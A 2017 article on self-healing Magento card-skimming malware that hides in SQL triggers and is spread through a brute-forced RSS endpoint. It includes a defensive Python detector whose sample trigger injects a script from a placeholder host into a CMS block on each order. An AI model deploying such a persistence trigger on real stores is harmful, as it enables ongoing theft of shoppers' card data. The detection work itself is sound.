Self-Healing Magento Malware Attack

By Aakanksha Patel
February 16, 2017

A new self-healing malware has been discovered by Dutch malware experts. It targets online stores running on the Magento platform, runs whenever a customer places a new order, and can restore itself using code hidden in the store's database.

Although this is not the first time malware has hidden code in a website's database, it is the first Magento malware known to use SQL stored procedures.

How it attacks

When a user places a new order, a malicious database trigger (a set of automated SQL operations, also referred to here as a stored procedure) executes before Magento runs its PHP code and assembles the page.

This trigger checks whether the malware's JavaScript is still present in the store's header, footer and copyright section. It also looks in the various Magento CMS blocks where the malicious code could be placed.

If no trace of its JavaScript is found, the trigger contains instructions that re-insert it into the website's source code through a series of SQL operations.

Although this Magento malware also has JS and PHP components that steal customers' card information, the SQL component is new. According to the researchers, the SQL portion exists to ensure the malware survives as long as possible.

When the experts tried to remove the malware, it proved resilient and began attacking the database rather than the e-commerce application. Because the malware is so complex, removal may require a certified Magento developer to ensure it is eliminated completely and effectively.

How to check and fix the malware

Check the database for the hidden malware. Magento Enterprise and some community extensions install legitimate triggers of their own, so not every trigger is malicious. Look for triggers with suspicious SQL code, such as anything containing admin, .js, script or the angle brackets of HTML tags. Once found, the trigger needs to be deleted.
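One way to carry out that check, as an added example that is not from the original article or the researchers' own tooling: export the trigger definitions from information_schema and flag the ones whose bodies match the keywords above or that fire on an order table while writing to Magento's CMS or config tables. The keyword list comes from the text; the table names, the sample rows and the "sales_ table writing to cms/config" heuristic are assumptions.

```python
"""Flag MySQL triggers shaped like the self-healing Magento malware.

Rows are constructed here to mirror what this query returns in the store DB:
  SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, EVENT_MANIPULATION, ACTION_STATEMENT
  FROM information_schema.TRIGGERS WHERE TRIGGER_SCHEMA = DATABASE();
"""
import re

# Suspicious tokens named in the article: admin, .js, script, HTML angle brackets.
SUSPICIOUS = re.compile(r"admin|\.js|script|<", re.IGNORECASE)
# Assumption: tables where header/footer/copyright text and CMS blocks live (Magento 1).
PERSISTENCE_TABLES = ("cms_block", "cms_page", "core_config_data")


def classify_trigger(name, table, event, body):
    """Return the reasons a trigger looks malicious; an empty list means clean."""
    reasons = []
    hits = {h.lower() for h in SUSPICIOUS.findall(body)}
    if hits:
        reasons.append("body contains suspicious token(s): %s" % ", ".join(sorted(hits)))
    lowered = body.lower()
    if table.startswith("sales_") and any(t in lowered for t in PERSISTENCE_TABLES):
        reasons.append("fires on %s %s but writes to CMS/config tables" % (table, event))
    return reasons


def find_suspicious_triggers(rows):
    """Map trigger name -> reasons for every row that classify_trigger flags."""
    flagged = {}
    for name, table, event, body in rows:
        reasons = classify_trigger(name, table, event, body)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed sample: a benign changelog trigger of the kind Magento Enterprise
# installs, and a trigger shaped like the malware described above (placeholder host).
SAMPLE_TRIGGERS = [
    ("trg_catalog_product_entity_after_insert", "catalog_product_entity", "INSERT",
     "BEGIN INSERT IGNORE INTO catalog_product_flat_cl (entity_id) "
     "VALUES (NEW.entity_id); END"),
    ("sales_order_before_insert", "sales_order", "INSERT",
     "BEGIN UPDATE cms_block SET content = CONCAT(content, "
     "'<script src=\"https://PLACEHOLDER.invalid/x.js\"></script>') "
     "WHERE identifier = 'footer_links' AND content NOT LIKE '%PLACEHOLDER.invalid%'; END"),
]

if __name__ == "__main__":
    # Review flagged triggers by hand before dropping them: legitimate ones exist.
    for trigger, why in find_suspicious_triggers(SAMPLE_TRIGGERS).items():
        print(trigger, "->", "; ".join(why))
```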

For future reference

The entry vector for this malware was a brute-force attack on /rss/catalog/notifystock/, in what was previously believed to be completely secure. Keep this in mind when managing the security of your Magento store in the future.
